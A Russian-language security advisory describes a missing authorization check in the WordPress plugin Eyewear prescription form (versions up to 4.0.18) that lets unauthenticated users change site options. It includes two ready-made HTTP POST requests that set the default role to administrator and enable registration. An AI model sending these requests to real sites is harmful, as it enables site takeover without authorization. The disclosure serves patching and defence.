
Форма рецепта на очки <= 4.0.18 - Отсутствие авторизации, приводящее к неаутентифицированному произвольному обновлению параметров
Форма рецептов на очки <= 4.0.18 — отсутствие авторизации приводит к неаутентифицированному произвольному обновлению опций
Плагин Eyewear prescription form для WordPress уязвим к несанкционированному изменению данных, что может привести к повышению привилегий из-за отсутствия проверки прав доступа в функции adminSetting() во всех версиях до 4.0.18 включительно. Это позволяет неаутентифицированным злоумышленникам обновлять произвольные опции на сайте WordPress. Данную уязвимость можно использовать для изменения роли по умолчанию при регистрации на администратора и включения регистрации пользователей, что позволит злоумышленникам получить административный доступ к уязвимому сайту.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=default_role&data[settingValue]=administrator
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=users_can_register&data[settingValue]=1